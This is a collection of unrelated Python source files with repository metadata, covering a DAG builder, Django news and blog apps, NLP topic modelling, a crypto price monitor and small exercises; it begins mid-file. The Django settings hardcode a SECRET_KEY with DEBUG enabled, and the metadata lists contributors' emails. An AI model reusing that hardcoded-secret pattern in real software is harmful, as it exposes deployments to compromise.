return self.sub_dag_builder
raise Exception(
'Node type `{}` has no known target builder'.format(
node_type))
def render_target(self, node):
builder = self.get_target_builder_cls(node.type)(
dag=self.get_secondary_dag(node.target),
graph=self.get_secondary_graph(node.target),
reference_path=self.reference_path + [node.name],
specs=self.specs,
referring_node=node,
sub_dag_builder=self.sub_dag_builder,
generator_builder=self.generator_builder,
)
return builder.build()
def build(self):
# Keep track of which subdag and generator targets have been rendered.
# These targets can be reused by multiple referring nodes.
rendered_targets = set()
# We build the result by appending components to an array and then
# joining together at the end
components = [self.preamble()]
# generators are rendered last, because they refer to both upstream and
# downstream components when they express their dependencies
generator_components = []
for node in self.graph.ordered():
operator = None
if node.type in set([NodeTypes.GENERATOR, NodeTypes.SUBDAG]) \
and node.target not in rendered_targets:
operator = '\n'.join([
self.render_target(node),
self.render_operator(node)])
rendered_targets.add(node.target)
elif node.type in NodeTypes:
operator = self.render_operator(node)
else:
raise Exception(
'Unrecognized operator type: {}'.format(node.type))
# add the rendered operator to the appropriate components list
(components if node.type != NodeTypes.GENERATOR else generator_components).append(
util.add_leading_spaces(
operator,
1 if self.indent_operators else 0))
components += generator_components
components.append(self.epilogue())
return '\n'.join(filter(None, components))
|
[
"mchalek@gmail.com"
] |
mchalek@gmail.com
|
9ac71ff258e15cccc153cde0ad3f3d89c6d93d2d
|
3850b80059dc5105504c56300dbbc5c70d3ac533
|
/models/__init__.py
|
a495e6c3da7339c6a90a4c7d428ad2be25088dba
|
[] |
no_license
|
haohaom1/intrinsic-images
|
cea56f6991dbdde89dd26621716a08c5f51f7ac4
|
e3e0ddf85b843c3aa93bccf717f80364a15c38b0
|
refs/heads/master
| 2022-12-05T08:37:31.138944
| 2021-08-12T16:07:06
| 2021-08-12T16:07:06
| 193,809,832
| 0
| 3
| null | 2022-11-22T03:59:22
| 2019-06-26T01:45:51
|
Python
|
UTF-8
|
Python
| false
| false
| 34
|
py
|
# file to make this folder a model
|
[
"riallenma@gmail.com"
] |
riallenma@gmail.com
|
7a883866c1dc23352c28cb30226f37e61c4eecf9
|
13884f547752c1f7d5b45d63a8e3aeebaea5a591
|
/newsproject/newsproject/settings.py
|
43da654da7fedf2f86c2779e0e66d4df147839d2
|
[] |
no_license
|
azharashra05/newsapp_repo
|
5139a7d33767b43b83ebc255aa40f2ee6dc17efc
|
e487ae15f103aa3e0d7b4b405f1c6e2a729ffeb3
|
refs/heads/master
| 2022-12-10T21:07:49.371475
| 2020-09-05T07:57:28
| 2020-09-05T07:57:28
| 293,029,679
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,253
|
py
|
"""
Django settings for newsproject project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR=os.path.join(BASE_DIR,'templates')
STATIC_DIR=os.path.join(BASE_DIR,'static')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ak9*^19hq5aeh9+i=v4#3vm7_@tce4i#bf5d!hfw_camqsz0re'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'newsapp'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'newsproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'newsproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS=[
STATIC_DIR,
]
|
[
"azharashraf05@gmail.com"
] |
azharashraf05@gmail.com
|
ec782cbc862fb7d8fded12eba2199a87bd70e120
|
b186f73f14b5e93e763bc284cc0ca5737ad40c4a
|
/blog/forms.py
|
aa355e8bb86cd10ec6099e3cf945812cc5097ee6
|
[] |
no_license
|
basmaaitbelarbi/blog_django
|
ba667174ecd7209c49b00a48e7f42b4fdf92c96d
|
af763b2db0704c9d41c2d3355a30f29b30ef8bf5
|
refs/heads/master
| 2021-05-23T14:41:36.841520
| 2020-04-24T00:25:03
| 2020-04-24T00:25:03
| 253,344,995
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 422
|
py
|
from django import forms
from .models import Comment, Post
#ntest cmass
class NewComment(forms.ModelForm):
class Meta:
model = Comment
fields = ('name', 'email', 'body')
class PostCreateForm(forms.ModelForm):
title = forms.CharField(label='title')
content = forms.CharField(label='content', widget=forms.Textarea)
class Meta:
model = Post
fields = ['title', 'content']
|
[
"basmaaitbelarbi@gmail.com"
] |
basmaaitbelarbi@gmail.com
|
3ec32164666ac523827540b3380e72da6133f4c2
|
0d73e045f83f1765b9d598f9cebb2ec328353c99
|
/15A Reading the Program.py
|
89eeeace4a4fbac67b9fb6dd0f9013bfac0e2e2d
|
[] |
no_license
|
Jalbanese1441/Waterloo-CS-Circles-Solutions
|
642553db986cf7d53af133eb79a9abc097107a91
|
0506e2f7f62ec9ff4a5fc412b0526995164844ab
|
refs/heads/master
| 2023-02-01T18:09:57.375959
| 2020-12-18T23:50:18
| 2020-12-18T23:50:18
| 277,946,727
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 134
|
py
|
def getBASIC():
holder=[]
x=""
while x.endswith("END")==False:
x=input()
holder.append(x)
return holder
|
[
"67984785+Jalbanese1441@users.noreply.github.com"
] |
67984785+Jalbanese1441@users.noreply.github.com
|
15b6ae2d70b9799cb8748159e727ba2aff01ca67
|
a7b4bd1db26f71ab941076691d894583e167a3fd
|
/tools/cli_auto_doc.py
|
3fa4e46f23cc9b1663fdece8826ea5510b80263b
|
[
"Apache-2.0"
] |
permissive
|
Mirantis/stackalytics
|
c422ccb27baa3f1fd7e68b9732ba0203144a3657
|
96ec7c6c630a9f2532b808069e045d434bbac200
|
refs/heads/master
| 2021-01-18T21:58:38.904481
| 2017-01-25T11:14:12
| 2017-01-25T11:14:12
| 10,863,780
| 3
| 4
|
Apache-2.0
| 2020-02-26T11:45:53
| 2013-06-22T11:17:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,806
|
py
|
# Copyright (c) 2015 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
try:
import ConfigParser as configparser
except ImportError:
import configparser
def split_multiline(value):
value = [element for element in
(line.strip() for line in value.split('\n'))
if element]
return value
def get_entry_points(config):
if 'entry_points' not in config:
return {}
return dict((option, split_multiline(value))
for option, value in config['entry_points'].items())
def make(cfg, dest):
parser = configparser.RawConfigParser()
parser.read(cfg)
config = {}
for section in parser.sections():
config[section] = dict(parser.items(section))
entry_points = get_entry_points(config)
console_scripts = entry_points.get('console_scripts')
if console_scripts:
for item in console_scripts:
tool = item.split('=')[0].strip()
print('Running %s' % tool)
os.system('%(tool)s --help > %(dest)s/%(tool)s.txt' %
dict(tool=tool, dest=dest))
if len(sys.argv) < 2:
print('Usage: cli_auto_doc <dest folder>')
sys.exit(1)
print('Generating docs from help to console tools')
make(cfg='setup.cfg', dest=sys.argv[1])
|
[
"ishakhat@mirantis.com"
] |
ishakhat@mirantis.com
|
58893a54c197fb68eeb0d035302bf64d8d6e53e9
|
acb8e84e3b9c987fcab341f799f41d5a5ec4d587
|
/langs/3/gD3.py
|
aa7152104068969fce4fab0f59d40adbf339df10
|
[] |
no_license
|
G4te-Keep3r/HowdyHackers
|
46bfad63eafe5ac515da363e1c75fa6f4b9bca32
|
fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2
|
refs/heads/master
| 2020-08-01T12:08:10.782018
| 2016-11-13T20:45:50
| 2016-11-13T20:45:50
| 73,624,224
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 486
|
py
|
import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'gD3':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1])
|
[
"juliettaylorswift@gmail.com"
] |
juliettaylorswift@gmail.com
|
1a8b3763c8a94e48cf8da659c686babc72716600
|
80abe7427ca501da06a9507cefa52d5c290f2833
|
/Chapter04/topic_modeling.py
|
841891d56168915143ec57282aeab11713c75372
|
[] |
no_license
|
CodedQuen/Raspberry-Pi-3-Cookbook-for-Python-Programmers
|
7910c9cf9ebaf6f42510bd531bf965fd03e6efe8
|
4a77452c4510fd9c7da62099a93fdbc95a86245a
|
refs/heads/master
| 2022-06-10T04:36:59.316284
| 2020-05-05T10:18:33
| 2020-05-05T10:18:33
| 261,421,883
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,220
|
py
|
from nltk.tokenize import RegexpTokenizer
from nltk.stem.snowball import SnowballStemmer
from gensim import models, corpora
from nltk.corpus import stopwords
# Load input words
def load_words(in_file):
element = []
with open(in_file, 'r') as f:
for line in f.readlines():
element.append(line[:-1])
return element
# Class to preprocedure of text
class Preprocedure(object):
# Initialize various operators
def __init__(self):
# Create a regular expression tokenizer
self.tokenizer = RegexpTokenizer(r'\w+')
# get the list of stop words
self.english_stop_words= stopwords.words('english')
# Create a Snowball stemmer
self.snowball_stemmer = SnowballStemmer('english')
# Tokenizing, stop word removal, and stemming
def procedure(self, in_data):
# Tokenize the string
token = self.tokenizer.tokenize(in_data.lower())
# Remove the stop words
tokenized_stopwords = [x for x in token if not x in self.english_stop_words]
# Perform stemming on the tokens
token_stemming = [self.snowball_stemmer.stem(x) for x in tokenized_stopwords]
return token_stemming
if __name__=='__main__':
# File containing linewise input data
in_file = 'data_topic_modeling.txt'
# Load words
element = load_words(in_file)
# Create a preprocedure object
preprocedure = Preprocedure()
# Create a list for processed documents
processed_tokens = [preprocedure.procedure(x) for x in element]
# Create a dictionary based on the tokenized documents
dict_tokens = corpora.Dictionary(processed_tokens)
corpus = [dict_tokens.doc2bow(text) for text in processed_tokens]
# Generate the LDA model based on the corpus we just created
num_of_topics = 2
num_of_words = 4
ldamodel = models.ldamodel.LdaModel(corpus,
num_topics=num_of_topics, id2word=dict_tokens, passes=25)
print "Most contributing words to the topics:"
for item in ldamodel.print_topics(num_topics=num_of_topics, num_words=num_of_words):
print "\nTopic", item[0], "==>", item[1]
|
[
"noreply@github.com"
] |
CodedQuen.noreply@github.com
|
be1bf8bedb3397c20eaccb3b6536f27ed3bc8b82
|
aab904ff48ee50db955ec844e5663a64404a1042
|
/gemini.py
|
8d0795d7c7c3de2e37d8d6b183f5eaf3dfa8072f
|
[] |
no_license
|
walazdev/GeminiChallenge
|
b5bd82aefe2768b949589793a5c526e3e78893d5
|
459d38385c84697f188893b8d5f8e07cec29b4d2
|
refs/heads/main
| 2023-04-01T17:19:21.405599
| 2021-03-22T17:37:19
| 2021-03-22T17:37:19
| 350,207,460
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,733
|
py
|
import requests, json, sys, time, datetime
def main():
userInput = sys.argv[1]
try:
userInputFloat = float(userInput)
except ValueError:
print("Usage: python3 gemini.py [% threshold]")
print("[% threshold] has to be a number")
sys.exit(1)
if (len(sys.argv) != 2):
print("Usage: python3 gemini.py [% threshold]")
sys.exit(1)
print("User % change threshold:", sys.argv[1])
# get tickers and sort by alphabetical order
print(datetime.datetime.now(), "- INFO: Retrieving tickers")
ticker_url = "https://api.gemini.com/v1/symbols"
response = requests.get(ticker_url)
tickers = sorted(response.json())
while True:
for i in range (0, len(tickers)):
# Get general information about specific ticker from list of tickers.
# The information that will be of use is: open price (opening price 24hr ago), ask (current best offer)
timestamp = datetime.datetime.now()
specificTicker = tickers[i]
tickerURL = "https://api.gemini.com/v2/ticker/" + specificTicker
tickerInfo = requests.get(tickerURL).json()
# On 3/22/2021, 7 more tickers were added, some of which had no information (or None) in certain keys
# The code below is to account for these new tickers without information, as the code would throw errors if no information was present
if tickerInfo['ask'] == None:
continue
print(timestamp, "- INFO: Fetched", specificTicker, "information")
# uncomment line below to adhere to API rate limits
# time.sleep(1.0)
# Retrieve and compute price information
openPrice = float(tickerInfo['open'])
currentPrice = float(tickerInfo['ask'])
percentPriceChange = get24hrPriceChange(currentPrice, openPrice)
# Price change threshold exceeded
if abs(percentPriceChange) > userInputFloat:
print(timestamp, "- ERROR:", specificTicker, "***** PRICE CHANGE *****")
# Price change threshold NOT exceeded (in either direction, +/-)
else:
print(timestamp, "- INFO:", specificTicker, "has not exceeded threshold")
# Print general information on the ticker of interest, regardless of price change status
print(timestamp, "|", specificTicker, "| Current price:", currentPrice, "| Open price:", openPrice, "| % change:", round(percentPriceChange, 2))
def get24hrPriceChange(finalPrice, startPrice):
result = ((finalPrice - startPrice) / startPrice) * 100
return result
if __name__ == "__main__":
main()
|
[
"willzs@umich.edu"
] |
willzs@umich.edu
|
8330dd686199cc1515e5595364a6d6fc22e245f6
|
5d9105fc2b36967ae99a09649021cdcaf71a72ed
|
/Project1_804587205_204617837_004589213_204587029/polynomial/plot_underfitting_overfitting.py
|
349f38db338997e934f086c19f6c5724fb38a987
|
[] |
no_license
|
ishan793/EE239-Big-Data-Analysis
|
2a9e0a126f9054798f67b233f2fc50c5f7380225
|
310080a39f111705b2271a9c61b61b3f5b33e91e
|
refs/heads/master
| 2020-04-09T20:06:38.207491
| 2016-02-28T21:43:03
| 2016-02-28T21:43:03
| 50,261,455
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,557
|
py
|
"""
============================
Underfitting vs. Overfitting
============================
This example demonstrates the problems of underfitting and overfitting and
how we can use linear regression with polynomial features to approximate
nonlinear functions. The plot shows the function that we want to approximate,
which is a part of the cosine function. In addition, the samples from the
real function and the approximations of different models are displayed. The
models have polynomial features of different degrees. We can see that a
linear function (polynomial with degree 1) is not sufficient to fit the
training samples. This is called **underfitting**. A polynomial of degree 4
approximates the true function almost perfectly. However, for higher degrees
the model will **overfit** the training data, i.e. it learns the noise of the
training data.
We evaluate quantitatively **overfitting** / **underfitting** by using
cross-validation. We calculate the mean squared error (MSE) on the validation
set, the higher, the less likely the model generalizes correctly from the
training data.
"""
#print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import LinearRegression
from sklearn import cross_validation
import pickle
from sklearn.metrics import mean_squared_error
np.random.seed(0)
#data = pickle.load( open( "housing_data.pickle", "rb" ) )
data=pickle.load(open('network.pickle','rb'))
X=np.array(data['x'],dtype='float')
y=np.array(data['y'],dtype='float')
print X.shape
n_samples=X.shape[0]
y=np.reshape(y,(n_samples,1))
print y.shape
degrees = [1]
avg_score=[]
fixed_score=[]
X_test=X[0:50,:]
y_test=y[0:50,:]
X_train=X[51:,:]
y_train=y[51:,:]
#plt.figure(figsize=(14, 5))
'''for i in range(len(degrees)):
#ax = plt.subplot(1, len(degrees), i + 1)
#plt.setp(ax, xticks=(), yticks=())
polynomial_features = PolynomialFeatures(degree=degrees[i],interaction_only=True,
include_bias=False)
linear_regression = LinearRegression()
pipeline = Pipeline([("polynomial_features", polynomial_features),
("linear_regression", linear_regression)])
#pipeline.fit(X,y)
# Evaluate the models using crossvalidation
scores = cross_validation.cross_val_score(pipeline,
X, y, scoring="mean_squared_error", cv=10)
scores=np.average((abs(scores)**0.5))
avg_score.append(scores)
#plt.plot(X_test, true_fun(X_test), label="True function")
#plt.scatter(X, y, label="Samples")
#plt.xlabel("x")
#plt.ylabel("y")
#plt.xlim((0, 1))
#plt.ylim((-2, 2))
#plt.legend(loc="best")
#plt.title("Degree {}\nMSE = {:.2e}(+/- {:.2e})".format(
#degrees[i], -scores.mean(), scores.std()))
#plt.show()'''
'''print avg_score
plt.scatter(degrees,avg_score)
plt.show()'''
plt.figure(figsize=(14,5))
for i in range(len(degrees)):
ax=plt.subplot(1,len(degrees),i+1)
plt.setp(ax,xticks=(),yticks=())
poly=PolynomialFeatures(degree=degrees[i])
X_train_trans = poly.fit_transform(X_train)
X_test_trans = poly.fit_transform(X_test)
regr =LinearRegression()
regr.fit(X_train_trans,y_train)
y_pred = regr.predict(X_test_trans)
fixed_score.append((mean_squared_error(y_test,y_pred)**0.5))
#plt.plot(range(len(y_test)),(y_test-pipeline.predict(X_test)),range(len(y_test)),[0]*len(y_test))
print fixed_score
plt.scatter(degrees,fixed_score)
plt.show()
|
[
"pulkitagrawal2311@gmail.com"
] |
pulkitagrawal2311@gmail.com
|
25e2f3a9ceb559034509a531ca8eec0c56c15cdc
|
9fcf684509bf39dbd7fcf7999e847b88ffb27a44
|
/facebookbot/http_client.py
|
6ec1347131f9b4cf5b5e5e61f03e3e3dc1b1d139
|
[
"Apache-2.0"
] |
permissive
|
tailin/python-messengerbot-sdk
|
916dd36279828ea76d21a5c90e26cf93c8ef1934
|
cbe04b1a6b94b7cd7c04d06348737c041643b242
|
refs/heads/master
| 2020-04-27T11:31:09.368708
| 2019-03-07T07:00:25
| 2019-03-07T07:00:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,280
|
py
|
from __future__ import unicode_literals
from abc import ABCMeta, abstractmethod, abstractproperty
import requests
from future.utils import with_metaclass
class HttpClient(with_metaclass(ABCMeta)):
"""Abstract Base Classes of HttpClient."""
DEFAULT_TIMEOUT = 5
def __init__(self, timeout=DEFAULT_TIMEOUT):
"""__init__ method.
:param timeout: (optional) How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`DEFAULT_TIMEOUT`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
self.timeout = timeout
@abstractmethod
def get(self, url, headers=None, params=None, stream=False, timeout=None):
"""GET request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param dict params: (optional) Request query parameter
:param bool stream: (optional) get content as stream
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
raise NotImplementedError
@abstractmethod
def post(self, url, headers=None, params=None, data=None, timeout=None):
"""POST request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
raise NotImplementedError
@abstractmethod
def delete(self, url, headers=None, data=None, timeout=None):
"""DELETE request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
raise NotImplementedError
class RequestsHttpClient(HttpClient):
"""HttpClient implemented by requests."""
def __init__(self, timeout=HttpClient.DEFAULT_TIMEOUT):
"""__init__ method.
:param timeout: (optional) How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`DEFAULT_TIMEOUT`
:type timeout: float | tuple(float, float)
"""
super(RequestsHttpClient, self).__init__(timeout)
def get(self, url, headers=None, params=None, stream=False, timeout=None):
"""GET request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param dict params: (optional) Request query parameter
:param bool stream: (optional) get content as stream
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: :py:class:`RequestsHttpResponse`
:return: RequestsHttpResponse instance
"""
if timeout is None:
timeout = self.timeout
response = requests.get(
url, headers=headers, params=params, stream=stream, timeout=timeout
)
return RequestsHttpResponse(response)
def post(self, url, headers=None, params=None, data=None, timeout=None):
"""POST request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: :py:class:`RequestsHttpResponse`
:return: RequestsHttpResponse instance
"""
if timeout is None:
timeout = self.timeout
response = requests.post(
url, headers=headers, params=params, data=data, timeout=timeout
)
return RequestsHttpResponse(response)
def delete(self, url, headers=None, data=None, timeout=None):
"""DELETE request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: :py:class:`RequestsHttpResponse`
:return: RequestsHttpResponse instance
"""
if timeout is None:
timeout = self.timeout
response = requests.delete(
url, headers=headers, data=data, timeout=timeout
)
return RequestsHttpResponse(response)
class HttpResponse(with_metaclass(ABCMeta)):
"""HttpResponse."""
@abstractproperty
def status_code(self):
"""Get status code."""
raise NotImplementedError
@abstractproperty
def headers(self):
"""Get headers."""
raise NotImplementedError
@abstractproperty
def text(self):
"""Get request body as text-decoded."""
raise NotImplementedError
@abstractproperty
def content(self):
"""Get request body as binary."""
raise NotImplementedError
@abstractproperty
def json(self):
"""Get request body as json-decoded."""
raise NotImplementedError
@abstractmethod
def iter_content(self, chunk_size=1024, decode_unicode=False):
"""Get request body as iterator content (stream).
:param int chunk_size:
:param bool decode_unicode:
"""
raise NotImplementedError
class RequestsHttpResponse(HttpResponse):
"""HttpResponse implemented by requests lib's response."""
def __init__(self, response):
"""__init__ method.
:param response: requests lib's response
"""
self.response = response
@property
def status_code(self):
"""Get status code."""
return self.response.status_code
@property
def headers(self):
"""Get headers."""
return self.response.headers
@property
def text(self):
"""Get request body as text-decoded."""
return self.response.text
@property
def content(self):
"""Get request body as binary."""
return self.response.content
@property
def json(self):
"""Get request body as json-decoded."""
return self.response.json()
def iter_content(self, chunk_size=1024, decode_unicode=False):
"""Get request body as iterator content (stream).
:param int chunk_size:
:param bool decode_unicode:
"""
return self.response.iter_content(chunk_size=chunk_size, decode_unicode=decode_unicode)
|
[
"t0915290092@gmail.com"
] |
t0915290092@gmail.com
|
985dad9eac8bbe27fa5b3adfb04734809e871ce4
|
ae16f9dd815605e5f52f27dda77bd735abafb587
|
/parser/councilors/elections_config.py
|
1bf0e2a7db9c45f4024b1026e1cd6c38e1f368c0
|
[
"CC0-1.0"
] |
permissive
|
travishen/councilor-voter-guide
|
aa4a1aa3b86db9ca40b291baf461ff0330a369c0
|
09d9365676335854b2d4d0981f5cb925adf4c958
|
refs/heads/master
| 2020-04-13T10:09:07.688276
| 2018-11-28T14:51:05
| 2018-11-28T14:51:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,827
|
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys
sys.path.append('../')
import re
import json
import psycopg2
import ast
from sys import argv
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import db_settings
conn = db_settings.con()
c = conn.cursor()
election_year = ast.literal_eval(argv[1])['election_year']
def parse_districts(county, districts):
districts = re.sub(u'^(居住|【)', '', districts)
category = re.search(u'(平地原住民|山地原住民)$', districts)
districts = re.sub(u'(平地原住民|山地原住民)$', '', districts)
if category:
category = category.group()
districts = re.sub(u'(】|之)', '', districts)
l = []
if districts:
for district in districts.split(u'、'):
if len(district) == 2:
l = districts.split(u'、')
break
if not re.search(re.sub(u'[縣市]$', '', county), district):
district = re.sub(u'[鄉鎮市區]$', '', district)
l.append(district)
return l, category
# update constituencies
constituencies = json.load(open('../../voter_guide/static/json/dest/constituencies_%s.json' % election_year))
counties = {}
for region in constituencies:
if region['county'] not in counties.keys():
counties.update({
region['county']: {
'regions': [],
'duplicated': []
}
})
districts_list, category = parse_districts(region['county'], region['district'])
if category:
if districts_list:
district = u'%s(%s)' % (category, u'、'.join(districts_list))
else:
district = u'%s(%s)' % (category, u'全%s' % region['county'])
else:
district = u'、'.join(districts_list)
counties[region['county']]['regions'].append({
'constituency': region['constituency'],
'districts_list': districts_list,
'district': district,
'category': category
})
c.execute('''
update candidates_terms
set district = %s
where election_year = %s and county = %s and constituency = %s
''', (district, election_year, region['county'], region['constituency']))
scope = ['https://spreadsheets.google.com/feeds']
credentials = ServiceAccountCredentials.from_json_keyfile_name('credential.json', scope)
gc = gspread.authorize(credentials)
sh = gc.open_by_key('10zFDmMF9CJDXSIENXO8iJXKE5CLBY62i_mSeqe_qDug')
worksheets = sh.worksheets()
for wks in worksheets:
rows = wks.get_all_records()
if wks.title == u'議員':
for row in rows:
print row['county'], row['constituency']
if row['count_this']:
counties[row['county']]['regions'][int(row['constituency'])-1]['elected_count_pre'] = row['count_pre']
counties[row['county']]['regions'][int(row['constituency'])-1]['elected_count'] = row['count_this']
counties[row['county']]['regions'][int(row['constituency'])-1]['reserved_seats'] = row['reserved_seats']
else:
continue
config = json.dumps({'constituencies': counties})
c.execute('''
INSERT INTO elections_elections(id, data)
VALUES (%s, %s)
ON CONFLICT (id)
DO UPDATE
SET data = (COALESCE(elections_elections.data, '{}'::jsonb) || %s::jsonb)
''', [election_year, config, config])
conn.commit()
# update constituency_change
district_versions = json.load(open('../district_versions.json'))
config = json.dumps({'constituency_change': district_versions.get(election_year, {})})
c.execute('''
INSERT INTO elections_elections(id, data)
VALUES (%s, %s)
ON CONFLICT (id)
DO UPDATE
SET data = (COALESCE(elections_elections.data, '{}'::jsonb) || %s::jsonb)
''', [election_year, config, config])
conn.commit()
|
[
"twly.tw@gmail.com"
] |
twly.tw@gmail.com
|
c47b2a335796c963552a994e83d36361618a343d
|
7073c53c421018bd1a2c8a14e55c61bcf7c8ed04
|
/ask_1.py
|
c1ef86a87a8fd62f35b2730de5a77d797f38205a
|
[] |
no_license
|
AntonisEkatommatis/1o_Eksamino_PYTHON
|
0a0e075a2bff9705bca34ab3064ae58eab3305e1
|
d9c019d62bed1ed71f9c4a441c0fb814ffa3a730
|
refs/heads/master
| 2020-04-21T14:40:08.915040
| 2019-02-12T19:32:55
| 2019-02-12T19:32:55
| 169,642,646
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,076
|
py
|
#Ergasia 1
#Antonis Ekatommatis
#Eisagwgh sthn episthmh twn ypologistwn
#1o Eksamino
#Dimiourgia Synartisis
def sumIntervals (L):
a=[]
b=[]
asin=0
bsin=0
apot=0
#Eisagawgi sthn lista a oles tis arxes apo ta oria
for i in range(len(L)):
a.append(L[i][0])
#Eisagwgi sthn lista b ta teleutaia psifia kathe oriou
for i in range(len(L)):
b.append(L[i][1])
#Bubblesort
N=len(a)
for i in range(1,N,1):
for j in range(N-1,i-1,-1):
if a[j] < a[j-1]:
a[j],a[j-1]=a[j-1],a[j]
b[j],b[j-1]=b[j-1],b[j]
#Elegxoi gia na vgei to athroisma
for i in range(1,len(a)):
while a[i] < b[i-1]:
a[i]=a[i]+1
for i in range(len(a)):
while a[i] > b[i]:
b[i]=b[i]+1
for item in a:
asin+=item
for item in b:
bsin+=item
apot=bsin-asin
return apot
print sumIntervals([[1,2], [6, 10], [11, 15]])
